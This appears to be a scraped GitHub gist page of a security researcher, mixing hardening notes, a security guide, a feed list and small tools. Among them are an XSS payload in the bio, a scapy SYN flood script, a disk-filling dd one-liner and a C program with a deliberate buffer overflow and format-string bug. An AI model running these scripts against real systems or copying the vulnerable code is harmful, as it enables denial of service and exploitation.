🍌'>"><img src=x onerror=alert("never gonna give you up")>

nops 0x9090

  • No Warranty Included
  • All public code is MIT licensed
iptables -P INPUT ACCEPT
iptables -F
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT ACCEPT
iptables -L -v
@0x9090
0x9090 / gist:e02577d3bfa20d164b87f85cf60dc0e3
Last active October 13, 2017 05:36
Guide To Software Security
--- Reproduced From OneUpSecurity (Justin Taft) --- https://www.oneupsecurity.com/research/five-minute-guide-to-software-security/
Education is the best way to mitigate security breaches. Remember, security is not only a business decision, but also a moral decision. Always seek advice from an experienced security professional.
Hacker Mentality
Study and question everything. Break to learn, don't learn to break.
Don't assume something is secure without testing it.
Secure specifications are often implemented insecurely.
@0x9090
0x9090 / Nops_Blogs.opml
Last active March 27, 2025 22:29
My Infosec Blog List
<?xml version="1.0" encoding="UTF-8"?>
<opml version="1.0">
<head>
<title>Nops subscriptions in feedly Cloud</title>
</head>
<body>
<outline text="Security" title="Security">
<outline type="rss" text="X-Force Research – Security Intelligence" title="X-Force Research – Security Intelligence" xmlUrl="http://securityintelligence.com/topics/x-force/feed/" htmlUrl="https://securityintelligence.com"/>
<outline type="rss" text="SecurityIntelligence" title="SecurityIntelligence" xmlUrl="http://securityint.blogspot.com/feeds/posts/default" htmlUrl="http://securityint.blogspot.com/"/>
@0x9090
0x9090 / makeApp.sh
Created March 5, 2018 18:54
Create an OSX desktop app from a web page. (not my code, unsure who to credit)
#!/bin/sh
# Usage:
# makeApp.sh <appname> <url> <iconurl>
#
# Examples:
# ./makeApp.sh Gmail https://gmail.com http://3.bp.blogspot.com/_rx1dHU9EQFY/THCcfaArRsI/AAAAAAAAB-k/-T1oLDCAEZg/s1600/gmail_logo_contact.png
# ./makeApp.sh Gmail file:///path/to/my/downloaded/icon
# The app name. Example "Gmail". No spaces.
@0x9090
0x9090 / port_scanner.py
Created October 12, 2018 04:45
Pure Python Port Scanner
#!/usr/bin/env python
import socket
import subprocess
import sys
from datetime import datetime
remoteServer = raw_input("Enter a remote host to scan: ")
remoteServerIP = socket.gethostbyname(remoteServer)
@0x9090
0x9090 / syn_flood.py
Created October 12, 2018 05:02
SYN Flood DoS Script
import sys
from scapy.all import *
print "Field Values of packet sent"
p=IP(dst=sys.argv[1],id=1111,ttl=99)/TCP(sport=RandShort(),dport=[22,80],seq=12345,ack=1000,window=1000,flags="S")/"flooder"
ls(p)
print "Sending Packets in 0.3 second intervals for timeout of 4 sec"
ans,unans=srloop(p,inter=0.3,retry=2,timeout=4)
print "Summary of answered & unanswered packets"
ans.summary()
@0x9090
0x9090 / disk_dos.sh
Created October 12, 2018 05:10
Fill Linux Disk
#!/bin/bash
dd if=/dev/zero of=filename bs=$((1024*1024)) count=$((10*1024))
@0x9090
0x9090 / AWSSecGuide
Last active November 7, 2018 19:05
AWS Security - Getting Started
This document outlines several ways to harden your AWS environment using free tools and paid services.
1. Scout2 (free) - https://github.com/nccgroup/Scout2
* Scout2 is aimed at pentesters doing one-time audits of AWS environment configuration issues. It can output a report as HTML or JSON.
2. Prowler (free) - https://github.com/toniblyx/prowler
* Checks the items from the CIS Amazon Web Services Foundations Benchmark. - https://www.cisecurity.org/benchmark/amazon_web_services/
3. CloudSploit (free/paid) - https://github.com/cloudsploit/scans
* CloudSploit is a paid service, but it has two free options: you can run a manual scan from their website, or you can run their open-sourced engine and rules yourself.
4. AWS Trusted Advisor (freemium) - console.aws.amazon.com/trustedadvisor/
* AWS Trusted Advisor comes free with your AWS account and provides not only security checks, but also cost optimization, performance, and fault tolerance checks.
admin
pass
key
secret
cert
cred
auth
crypt
hash
hmac
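#include <stdio.h>
#include <string.h> /* strcpy */
int main(int argc, char * argv[])
{
char a[1024];
/* Copies argv[1] into the fixed 1024-byte stack buffer with no length check. */
strcpy(a, argv[1]);
/* Passes the copied user input to printf as the format string. */
printf(a);
printf("\n");
}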